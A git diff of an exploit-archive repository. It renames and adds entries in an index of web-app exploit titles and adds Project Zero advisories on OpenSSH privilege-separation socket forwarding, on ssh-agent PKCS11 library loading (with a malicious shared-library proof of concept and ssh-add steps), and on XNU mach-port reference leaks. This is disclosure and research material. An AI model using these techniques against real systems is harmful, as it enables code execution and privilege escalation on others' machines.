6650,platforms/php/webapps/6650.txt,"Link Trader - 'lnkid' Parameter SQL Injection",2008-10-01,"Hussin X",php,webapps,0
|
||||
6652,platforms/php/webapps/6652.txt,"Bux.to Clone Script - Insecure Cookie Handling",2008-10-02,SirGod,php,webapps,0
|
||||
6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - (infile) Local File Inclusion",2008-10-02,ZeN,php,webapps,0
|
||||
6655,platforms/php/webapps/6655.php,"OpenX 2.6 - (ac.php bannerid) Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0
|
||||
6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 - 'infile' Parameter Local File Inclusion",2008-10-02,ZeN,php,webapps,0
|
||||
6655,platforms/php/webapps/6655.php,"OpenX 2.6 - 'bannerid' Parameter Blind SQL Injection",2008-10-02,d00m3r4ng,php,webapps,0
|
||||
6657,platforms/php/webapps/6657.pl,"IP Reg 0.4 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
|
||||
6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script - 'arsaprint.php id' SQL Injection",2008-10-03,"Hussin X",php,webapps,0
|
||||
6662,platforms/php/webapps/6662.pl,"AdaptCMS Lite 1.3 - Blind SQL Injection",2008-10-03,StAkeR,php,webapps,0
|
||||
|
@ -19979,7 +19981,7 @@ id,file,description,date,author,platform,type,port
|
|||
7120,platforms/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - (Authentication Bypass) SQL Injection",2008-11-14,R3d-D3V!L,asp,webapps,0
|
||||
7121,platforms/php/webapps/7121.pl,"SlimCMS 1.0.0 - 'edit.php' SQL Injection",2008-11-14,StAkeR,php,webapps,0
|
||||
7122,platforms/php/webapps/7122.txt,"GS Real Estate Portal - Multiple SQL Injections",2008-11-14,InjEctOr5,php,webapps,0
|
||||
7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - (Authentication Bypass) SQL Injection",2008-11-14,ZoRLu,php,webapps,0
|
||||
7123,platforms/php/webapps/7123.txt,"X7 Chat 2.0.5 - Authentication Bypass",2008-11-14,ZoRLu,php,webapps,0
|
||||
7124,platforms/php/webapps/7124.txt,"TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection",2008-11-14,ZoRLu,php,webapps,0
|
||||
7128,platforms/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - 'chid' Parameter SQL Injection",2008-11-15,snakespc,php,webapps,0
|
||||
7130,platforms/php/webapps/7130.php,"Minigal b13 - 'index.php list' Remote File Disclosure",2008-11-15,"Alfons Luja",php,webapps,0
|
||||
|
@ -21467,7 +21469,7 @@ id,file,description,date,author,platform,type,port
|
|||
9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0
|
||||
9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Local File Inclusion / Cross-Site Scripting",2009-08-18,USH,php,webapps,0
|
||||
9451,platforms/php/webapps/9451.txt,"DreamPics Builder - 'exhibition_id' Parameter SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
|
||||
9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
|
||||
9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - 'article' Parameter Blind SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
|
||||
9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0
|
||||
9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0
|
||||
9460,platforms/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,php,webapps,0
|
||||
|
@ -22127,7 +22129,6 @@ id,file,description,date,author,platform,type,port
|
|||
10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10833,platforms/php/webapps/10833.txt,"Classifieds Script - (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10834,platforms/php/webapps/10834.txt,"Link Trader - (lnkid) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0
|
||||
10836,platforms/php/webapps/10836.txt,"Elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10837,platforms/php/webapps/10837.txt,"Quick Poll - 'code.php id' SQL Injection",2009-12-31,"Hussin X",php,webapps,0
|
||||
|
@ -25043,7 +25044,7 @@ id,file,description,date,author,platform,type,port
|
|||
18032,platforms/windows/webapps/18032.rb,"SAP Management Console - OSExecute Payload Execution (Metasploit)",2011-10-24,Metasploit,windows,webapps,0
|
||||
18035,platforms/php/webapps/18035.txt,"Online Subtitles Workshop - Cross-Site Scripting",2011-10-26,M.Jock3R,php,webapps,0
|
||||
18036,platforms/php/webapps/18036.txt,"eFront 3.6.10 (build 11944) - Multiple Vulnerabilities",2011-10-27,EgiX,php,webapps,0
|
||||
18037,platforms/php/webapps/18037.rb,"phpScheduleIt PHP - reserve.php start_date Parameter Arbitrary Code Injection (Metasploit)",2011-10-26,Metasploit,php,webapps,0
|
||||
18037,platforms/php/webapps/18037.rb,"phpScheduleIt 1.2.10 - 'reserve.php' Arbitrary Code Injection (Metasploit)",2011-10-26,Metasploit,php,webapps,0
|
||||
18039,platforms/php/webapps/18039.txt,"WordPress Plugin wptouch - SQL Injection",2011-10-27,longrifle0x,php,webapps,0
|
||||
18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0
|
||||
18047,platforms/php/webapps/18047.txt,"Joomla! Component 'com_jeemasms' 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
|
||||
|
@ -26842,7 +26843,7 @@ id,file,description,date,author,platform,type,port
|
|||
24238,platforms/php/webapps/24238.txt,"CuteNews 0.88/1.3 - 'example1.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
|
||||
24239,platforms/php/webapps/24239.txt,"CuteNews 0.88/1.3 - 'example2.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
|
||||
24240,platforms/php/webapps/24240.txt,"CuteNews 0.88/1.3 - 'show_archives.php' Cross-Site Scripting",2004-06-28,DarkBicho,php,webapps,0
|
||||
24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - modules.php Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0
|
||||
24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 - 'modules.php' Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0
|
||||
24244,platforms/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 - Null Byte Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0
|
||||
24245,platforms/cgi/webapps/24245.txt,"Netegrity IdentityMinder Web Edition 5.6 - Management Interface Cross-Site Scripting",2004-07-01,vuln@hexview.com,cgi,webapps,0
|
||||
24251,platforms/cgi/webapps/24251.txt,"Symantec Brightmail Anti-Spam 6.0 - Unauthorized Message Disclosure",2004-07-05,"Thomas Springer",cgi,webapps,0
|
||||
|
@ -27927,7 +27928,7 @@ id,file,description,date,author,platform,type,port
|
|||
26019,platforms/php/webapps/26019.txt,"Contrexx 1.0.4 - Multiple Input Validation Vulnerabilities",2005-07-22,"Christopher Kunz",php,webapps,0
|
||||
26020,platforms/php/webapps/26020.txt,"Asn Guestbook 1.5 - header.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0
|
||||
26021,platforms/php/webapps/26021.txt,"Asn Guestbook 1.5 - footer.php version Parameter Cross-Site Scripting",2005-07-22,rgod,php,webapps,0
|
||||
26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - Apa_PHPInclude.INC.php Remote File Inclusion",2005-07-25,lwdz,php,webapps,0
|
||||
26023,platforms/php/webapps/26023.txt,"Atomic Photo Album 0.x/1.0 - 'Apa_PHPInclude.INC.php' Remote File Inclusion",2005-07-25,lwdz,php,webapps,0
|
||||
26025,platforms/php/webapps/26025.txt,"Netquery 3.1 - submit.php portnum Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
|
||||
26026,platforms/php/webapps/26026.txt,"Netquery 3.1 - nqgeoip2.php Multiple Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
|
||||
26027,platforms/php/webapps/26027.txt,"Netquery 3.1 - nqgeoip.php step Parameter Cross-Site Scripting",2005-07-25,rgod,php,webapps,0
|
||||
|
@ -27940,10 +27941,10 @@ id,file,description,date,author,platform,type,port
|
|||
26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 - Demo.php Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps,0
|
||||
26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 - 'results.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 - 'categorysearch.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - topic.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - forums.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - post.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26042,platforms/php/webapps/26042.txt,"BMForum 3.0 - announcesys.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - 'topic.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - 'forums.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - 'post.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26042,platforms/php/webapps/26042.txt,"BMForum 3.0 - 'announcesys.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
|
||||
26043,platforms/php/webapps/26043.txt,"Clever Copy 2.0 - Private Message Unauthorized Access",2005-07-27,Lostmon,php,webapps,0
|
||||
26045,platforms/php/webapps/26045.txt,"phpList 2.8.12 - Admin Page SQL Injection",2005-07-28,tgo,php,webapps,0
|
||||
26046,platforms/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-28,Lostmon,cgi,webapps,0
|
||||
|
@ -28778,8 +28779,8 @@ id,file,description,date,author,platform,type,port
|
|||
27098,platforms/php/webapps/27098.txt,"RedKernel Referrer Tracker 1.1.0-3 - Rkrt_stats.php Cross-Site Scripting",2006-01-16,Preddy,php,webapps,0
|
||||
27099,platforms/php/webapps/27099.txt,"BlogPHP 1.0 - 'index.php' SQL Injection",2006-01-16,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
27100,platforms/php/webapps/27100.txt,"microBlog 2.0 - 'index.php' Multiple SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
|
||||
27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - search.php search Parameter Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
|
||||
27102,platforms/php/webapps/27102.txt,"PowerPortal 1.1/1.3 - 'index.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
|
||||
27103,platforms/php/webapps/27103.txt,"PowerPortal 1.1/1.3 - 'search.php' Cross-Site Scripting",2006-01-17,night_warrior771,php,webapps,0
|
||||
27104,platforms/php/webapps/27104.txt,"aoblogger 2.3 - URL BBcode Cross-Site Scripting",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
27105,platforms/php/webapps/27105.txt,"aoblogger 2.3 - 'login.php' 'Username' Field SQL Injection",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
|
@ -31305,8 +31306,8 @@ id,file,description,date,author,platform,type,port
|
|||
30750,platforms/php/webapps/30750.pl,"PHP-Nuke Advertising Module 0.9 - modules.php SQL Injection",2007-11-12,0x90,php,webapps,0
|
||||
30751,platforms/php/webapps/30751.html,"Miro Broadcast Machine 0.9.9 - 'login.php' Cross-Site Scripting",2007-11-12,"Hanno Boeck",php,webapps,0
|
||||
30754,platforms/php/webapps/30754.txt,"AutoIndex PHP Script 2.2.2 - PHP_SELF index.php Cross-Site Scripting",2007-08-27,L4teral,php,webapps,0
|
||||
30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - sources/frame.php room Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
|
||||
30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - upgradev1.php INSTALL_X7CHATVERSION Parameter Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
|
||||
30757,platforms/php/webapps/30757.txt,"X7 Chat 2.0.4 - 'frame.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
|
||||
30758,platforms/php/webapps/30758.txt,"X7 Chat 2.0.4 - 'upgradev1.php' Cross-Site Scripting",2007-11-12,ShAy6oOoN,php,webapps,0
|
||||
30759,platforms/cgi/webapps/30759.txt,"VTLS Web Gateway 48.1 - Searchtype Parameter Cross-Site Scripting",2007-11-13,"Jesus Olmos Gonzalez",cgi,webapps,0
|
||||
30762,platforms/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0
|
||||
30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0
|
||||
|
@ -31983,9 +31984,9 @@ id,file,description,date,author,platform,type,port
|
|||
31822,platforms/php/webapps/31822.txt,"PHPFreeForum 1.0 rc2 - part/menu.php Multiple Parameter Cross-Site Scripting",2008-05-22,tan_prathan,php,webapps,0
|
||||
31823,platforms/php/webapps/31823.txt,"phpSQLiteCMS 1 RC2 - cms/includes/header.inc.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31824,platforms/php/webapps/31824.txt,"phpSQLiteCMS 1 RC2 - cms/includes/login.inc.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' outpused Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - newtem/footer/bsd01footer.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - newtem/header/bsd01header.php Multiple Parameter Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31825,platforms/php/webapps/31825.txt,"BMForum 5.6 - 'index.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31826,platforms/php/webapps/31826.txt,"BMForum 5.6 - 'bsd01footer.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31827,platforms/php/webapps/31827.txt,"BMForum 5.6 - 'bsd01header.php' Cross-Site Scripting",2008-05-22,"CWH Underground",php,webapps,0
|
||||
31829,platforms/php/webapps/31829.txt,"AbleDating 2.4 - search_results.php keyword Parameter SQL Injection",2008-05-22,"Ali Jasbi",php,webapps,0
|
||||
31830,platforms/php/webapps/31830.txt,"AbleDating 2.4 - search_results.php keyword Parameter Cross-Site Scripting",2008-05-22,"Ali Jasbi",php,webapps,0
|
||||
32045,platforms/php/webapps/32045.txt,"eSyndiCat 2.2 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2008-07-10,Fugitif,php,webapps,0
|
||||
|
@ -32724,9 +32725,9 @@ id,file,description,date,author,platform,type,port
|
|||
33115,platforms/php/webapps/33115.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' replid Parameter SQL Injection",2009-06-27,Moudi,php,webapps,0
|
||||
33116,platforms/php/webapps/33116.txt,"AlmondSoft Multiple Classifieds Products - 'index.php' Multiple Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0
|
||||
33117,platforms/php/webapps/33117.txt,"AlmondSoft Classifieds Pro - gmap.php addr Parameter Cross-Site Scripting",2009-06-27,Moudi,php,webapps,0
|
||||
33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - courses_login.php cat_id Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
|
||||
33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - news_read.php id Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
|
||||
33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - lessons_login.php Multiple Parameter Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
|
||||
33119,platforms/php/webapps/33119.txt,"Pilot Group eTraining - 'courses_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
|
||||
33120,platforms/php/webapps/33120.txt,"Pilot Group eTraining - 'news_read.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
|
||||
33121,platforms/php/webapps/33121.txt,"Pilot Group eTraining - 'lessons_login.php' Cross-Site Scripting",2009-06-24,Moudi,php,webapps,0
|
||||
33122,platforms/php/webapps/33122.txt,"Joomla! Component com_user - 'view' Parameter URI redirection",2009-06-27,"599eme Man",php,webapps,0
|
||||
33125,platforms/php/webapps/33125.txt,"Joomla! Component Permis 1.0 (com_groups) - 'id' Parameter SQL Injection",2009-06-28,Prince_Pwn3r,php,webapps,0
|
||||
33126,platforms/php/webapps/33126.txt,"Matterdaddy Market 1.x - 'index.php' Cross-Site Scripting",2009-06-28,Moudi,php,webapps,0
|
||||
|
@ -35638,7 +35639,7 @@ id,file,description,date,author,platform,type,port
|
|||
37828,platforms/php/webapps/37828.txt,"Poweradmin - 'index.php' Cross-Site Scripting",2012-09-20,Siavash,php,webapps,0
|
||||
37829,platforms/php/webapps/37829.txt,"WordPress Plugin MF Gig Calendar - Cross-Site Scripting",2012-09-20,"Chris Cooper",php,webapps,0
|
||||
37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0
|
||||
37938,platforms/php/webapps/37938.txt,"OpenX - /www/admin/plugin-index.php parent Parameter Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0
|
||||
37938,platforms/php/webapps/37938.txt,"OpenX 2.8.10 - 'plugin-index.php' Cross-Site Scripting",2012-10-10,"High-Tech Bridge",php,webapps,0
|
||||
37939,platforms/php/webapps/37939.txt,"FileContral - Local File Inclusion / Local File Disclosure",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0
|
||||
38066,platforms/php/webapps/38066.txt,"WordPress Plugin Video Lead Form - 'errMsg' Parameter Cross-Site Scripting",2012-11-29,"Aditya Balapure",php,webapps,0
|
||||
38067,platforms/hardware/webapps/38067.py,"Thomson Wireless VoIP Cable Modem TWG850-4B ST9C.05.08 - Authentication Bypass",2015-09-02,Orwelllabs,hardware,webapps,80
|
||||
|
@ -36915,3 +36916,4 @@ id,file,description,date,author,platform,type,port
|
|||
40940,platforms/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0
|
||||
40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0
|
||||
40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0
|
||||
40961,platforms/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",multiple,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
26
platforms/linux/local/40962.txt
Executable file
26
platforms/linux/local/40962.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010
|
||||
|
||||
This issue affects OpenSSH if privilege separation is disabled (config option
|
||||
UsePrivilegeSeparation=no). While privilege separation is enabled by default, it
|
||||
is documented as a hardening option, and therefore disabling it should not
|
||||
directly make a system vulnerable.
|
||||
|
||||
OpenSSH can forward TCP sockets and UNIX domain sockets. If privilege separation
|
||||
is disabled, then on the server side, the forwarding is handled by a child of
|
||||
sshd that has root privileges. For TCP server sockets, sshd explicitly checks
|
||||
whether an attempt is made to bind to a low port (below IPPORT_RESERVED) and, if
|
||||
so, requires the client to authenticate as root. However, for UNIX domain
|
||||
sockets, no such security measures are implemented.
|
||||
|
||||
This means that, using "ssh -L", an attacker who is permitted to log in as a
|
||||
normal user over SSH can effectively connect to non-abstract unix domain sockets
|
||||
with root privileges. On systems that run systemd, this can for example be
|
||||
exploited by asking systemd to add an LD_PRELOAD environment variable for all
|
||||
following daemon launches and then asking it to restart cron or so. The attached
|
||||
exploit demonstrates this - if it is executed on a system with systemd where
|
||||
the user is allowed to ssh to his own account and where privsep is disabled, it
|
||||
yields a root shell.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40962.zip
|
33
platforms/linux/remote/40963.txt
Executable file
33
platforms/linux/remote/40963.txt
Executable file
|
@ -0,0 +1,33 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1009
|
||||
|
||||
The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded.
|
||||
|
||||
This means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine.
|
||||
|
||||
To reproduce the issue, first create a library that executes some command when it is loaded:
|
||||
|
||||
$ cat evil_lib.c
|
||||
#include <stdlib.h>
|
||||
__attribute__((constructor)) static void run(void) {
|
||||
// in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH,
|
||||
// prevent recursion through system()
|
||||
unsetenv("LD_PRELOAD");
|
||||
unsetenv("LD_LIBRARY_PATH");
|
||||
system("id > /tmp/test");
|
||||
}
|
||||
$ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall
|
||||
|
||||
Connect to another machine using "ssh -A". Then, on the remote machine:
|
||||
|
||||
$ ssh-add -s [...]/evil_lib.so
|
||||
Enter passphrase for PKCS#11: [just press enter here]
|
||||
SSH_AGENT_FAILURE
|
||||
Could not add card: [...]/evil_lib.so
|
||||
|
||||
At this point, the command "id > /tmp/test" has been executed on the machine running the ssh agent:
|
||||
|
||||
$ cat /tmp/test
|
||||
uid=1000(user) gid=1000(user) groups=[...]
|
||||
|
||||
|
||||
Fixed in http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/ssh-agent.c.diff?r1=1.214&r2=1.215&f=h
|
|
@ -1,16 +1,153 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=930
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=926
|
||||
|
||||
IOUserClient subclasses which override IOUserClient::externalMethod need to ensure that if they return
|
||||
kIOReturnSuccess they actually take ownership of the mach_port_t asyncWakePort if they are called via
|
||||
IOConnectCallAsyncMethod.
|
||||
mach ports are really struct ipc_port_t's in the kernel; this is a reference-counted object,
|
||||
ip_reference and ip_release atomically increment and decrement the 32 bit io_references field.
|
||||
|
||||
If the userclient code doesn't take ownership of the mach port and returns a success code MIG assumes that
|
||||
they did take ownership and won't release it's reference on the port. This leads to a reference count leak.
|
||||
Unlike OSObjects, ip_reference will allow the reference count to overflow, however it is still 32-bits
|
||||
so without either a lot of physical memory (which you don't have on mobile or most desktops) or a real reference leak
|
||||
this isn't that interesting.
|
||||
|
||||
See the previous bug for more in-depth discussion.
|
||||
** MIG and mach message rights ownership **
|
||||
|
||||
This PoC targets IOSurface which was just the first userclient I looked at; I imagine more are vulnerable.
|
||||
This PoC takes about an hour on 4 core MacBookPro to trigger the kernel UaF.
|
||||
ipc_kobject_server in ipc_kobject.c is the main dispatch routine for the kernel MIG endpoints. When userspace sends a
|
||||
message the kernel will copy in the message body and also copy in all the message rights; see for example
|
||||
ipc_right_copyin in ipc_right.c. This means that by the time we reach the actual callout to the MIG handler any port rights
|
||||
contained in a request have had their reference count increased by one.
|
||||
|
||||
After the callout we reach the following code (still in ipc_kobject_server):
|
||||
|
||||
if ((kr == KERN_SUCCESS) || (kr == MIG_NO_REPLY)) {
|
||||
// The server function is responsible for the contents
|
||||
// of the message. The reply port right is moved
|
||||
// to the reply message, and we have deallocated
|
||||
// the destination port right, so we just need
|
||||
// to free the kmsg.
|
||||
ipc_kmsg_free(request);
|
||||
} else {
|
||||
// The message contents of the request are intact.
|
||||
// Destroy everthing except the reply port right,
|
||||
// which is needed in the reply message.
|
||||
request->ikm_header->msgh_local_port = MACH_PORT_NULL;
|
||||
ipc_kmsg_destroy(request);
|
||||
}
|
||||
|
||||
If the MIG callout returns success, then it means that the method took ownership of *all* of the rights contained in the message.
|
||||
If the MIG callout returns a failure code then the means the method took ownership of *none* of the rights contained in the message.
|
||||
|
||||
ipc_kmsg_free will only destroy the message header, so if the message had any other port rights then their reference counts won't be
|
||||
decremented. ipc_kmsg_destroy on the other hand will decrement the reference counts for all the port rights in the message, even those
|
||||
in port descriptors.
|
||||
|
||||
If we can find a MIG method which returns KERN_SUCCESS but doesn't in fact take ownership of any mach ports its passed (by for example
|
||||
storing them and dropping the ref later, or using them then immediately dropping the ref or passing them to another method which takes
|
||||
ownership) then this can lead to us being able to leak references.
|
||||
|
||||
** indirect MIG methods **
|
||||
|
||||
Here's the MIG request structure generated for io_service_add_notification_ool_64:
|
||||
|
||||
typedef struct {
|
||||
mach_msg_header_t Head;
|
||||
// start of the kernel processed data
|
||||
mach_msg_body_t msgh_body;
|
||||
mach_msg_ool_descriptor_t matching;
|
||||
mach_msg_port_descriptor_t wake_port;
|
||||
// end of the kernel processed data
|
||||
NDR_record_t NDR;
|
||||
mach_msg_type_number_t notification_typeOffset; // MiG doesn't use it
|
||||
mach_msg_type_number_t notification_typeCnt;
|
||||
char notification_type[128];
|
||||
mach_msg_type_number_t matchingCnt;
|
||||
mach_msg_type_number_t referenceCnt;
|
||||
io_user_reference_t reference[8];
|
||||
mach_msg_trailer_t trailer;
|
||||
} Request __attribute__((unused));
|
||||
|
||||
|
||||
This is an interesting method as its implementation actually calls another MIG handler:
|
||||
|
||||
|
||||
static kern_return_t internal_io_service_add_notification_ool(
|
||||
...
|
||||
kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t) matching );
|
||||
data = CAST_DOWN(vm_offset_t, map_data);
|
||||
|
||||
if( KERN_SUCCESS == kr) {
|
||||
// must return success after vm_map_copyout() succeeds
|
||||
// and mig will copy out objects on success
|
||||
*notification = 0;
|
||||
*result = internal_io_service_add_notification( master_port, notification_type,
|
||||
(char *) data, matchingCnt, wake_port, reference, referenceSize, client64, notification );
|
||||
vm_deallocate( kernel_map, data, matchingCnt );
|
||||
}
|
||||
|
||||
return( kr );
|
||||
}
|
||||
|
||||
|
||||
and internal_io_service_add_notification does this:
|
||||
|
||||
|
||||
static kern_return_t internal_io_service_add_notification(
|
||||
...
|
||||
if( master_port != master_device_port)
|
||||
return( kIOReturnNotPrivileged);
|
||||
|
||||
do {
|
||||
err = kIOReturnNoResources;
|
||||
|
||||
if( !(sym = OSSymbol::withCString( notification_type )))
|
||||
err = kIOReturnNoResources;
|
||||
|
||||
if (matching_size)
|
||||
{
|
||||
dict = OSDynamicCast(OSDictionary, OSUnserializeXML(matching, matching_size));
|
||||
}
|
||||
else
|
||||
{
|
||||
dict = OSDynamicCast(OSDictionary, OSUnserializeXML(matching));
|
||||
}
|
